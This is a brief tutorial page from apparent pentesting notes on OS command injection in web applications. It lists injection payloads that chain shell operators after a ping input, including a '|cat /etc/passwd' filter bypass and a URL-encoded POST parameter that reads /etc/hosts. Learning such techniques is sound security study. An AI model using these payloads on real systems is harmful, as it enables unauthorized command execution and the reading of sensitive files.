OS Command injection (WIP)

Allow to execute arbitrary system commands on a host operating system via a vulnerable application. Normally happens when a web application takes a user-supplied input and passes it directly to a shell interpreter.

We can find a typical example of this vulnerability as follows:

When internally using functions like system or shell_exec which pass input to an internal command interpreter

#We send a petition with a command
curl -X POST http://url/? -d "cmd=whoami"
#If being handled by system(), it will respond with the output of the command, letting us we can talk to the internal shell

In some cases, the application will receive input and redirect it to an internal command executed in the server shell

#A form receives the IP as input and executes the ping command
8.8.8.8
#Example output
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_seq=1 ttl=117 time=26.4 ms
...
#Ww see that it works like the following command inside
ping $input

We can abuse this input to add other commands using the command operators

8.8.8.8; ls -la
8.8.8.8 & ls -la    
8.8.8.8 && ls -la
8.8.8.8 | ls -la
8.8.8.8 || ls -la

Sometimes it could be sanitized to detect these symbols, so to avoid detection, we can combine operators and commands into a single string, which helps bypass filtering

8.8.8.8|cat /etc/passwd

This could also work on request parameters that are passed to an internal OS command

#Example, the parameters are pass to and 
Content-Type: application/x-www-form-urlencoded
Id=15&name=a

# We could concatenate commands
Content-Type: application/x-www-form-urlencoded
Id=15&name=a%26cat%20%2fetc%2fhosts #Concatenating |cat /etc/hosts

PreviousCross-Site Scripting (WIP)NextXXE Injection (WIP)

Last updated 9 months ago